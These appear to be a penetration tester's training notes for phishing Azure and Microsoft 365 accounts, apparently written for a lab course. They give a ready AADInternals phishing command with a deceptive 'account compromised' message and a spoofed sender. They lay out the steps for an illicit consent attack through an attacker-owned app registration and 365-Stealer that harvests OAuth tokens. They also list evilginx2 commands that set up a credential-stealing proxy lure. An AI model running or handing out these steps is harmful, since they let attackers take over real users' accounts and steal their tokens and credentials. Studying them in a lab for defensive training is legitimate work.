Phishing Azure Accounts
phishing with aadinternals
$message = 'Dear recipient, <br> Your Microsoft account has been compromised. Login at <a href="{1}">https://microsoft.com</a> to reset your password. <br> Use the following security code: <b>{0}</b>.'
Invoke-AADIntPhishing -Recipients "[email protected]","[email protected]" -Subject "Your Microsoft account is compromised - Actions required." -Sender "Johnny Carson <[email protected]>" -SMTPServer smtp.myserver.local -Message $message -SaveToCache
# if a token was captured
Open-AADIntOWAIllicit Consent Attack
This depends upon allow user consents for all apps set on the target tenant. This is not done by default, but very often the case. This cannot be enumerated from a non-authenticated account, a blue-teamer can check this through:
Get-AzureADMSAuthorizationPolicy).PermissionGrantPolicyIdsAssignedToDefaultUserRoleSetup phishing infrastructure
In an attacker-controlled tenant, setup a new ‘App Registration’ in https://portal.azure.com:
- Accounts in any organizational directory (
Any Microsoft Entra ID tenant - Multi-Tenant) - redirect to web → point this to your stealer installation, e.g., https://172.16.150.64/login/authorized
- add a client secret
- select low-privilege permissions first, in
API permissions(permissions are inms graph→delegated):user.readUser.ReadBasic.All
Note the application-id (called client-id in the application registration overview pane) and the generated client secret.
Now setup o365-stealer and configure it.
- run xampp control panel as administrator and start apache
- copy 365-Stealer from
c:\AzAD\Toolstoc:\xampp\htdocs - go to http://localhost:82/365-stealer/yourVictims
- configuration
- applciation-id, client-secret, redirect to web url, 1sec delay
- configuration
Now you can start the stealer and copy the OAuth2 link (that is output in the shell output):
C:\xampp\htdocs\365-Stealer>python 365-Stealer.py --run-appphishing for credentials with evilginx
evilginx2 -p C:\AzAD\Tools\evilginx2\phishlets
config domain student64.corp
config ip 172.16.150.64
phishlets hostname o365 login.student64.corp
# now setup dns
# copy ssl/tls keys
phishlets enable o365
lures create o365
lures get-url 0And send the lure to a phishing victim.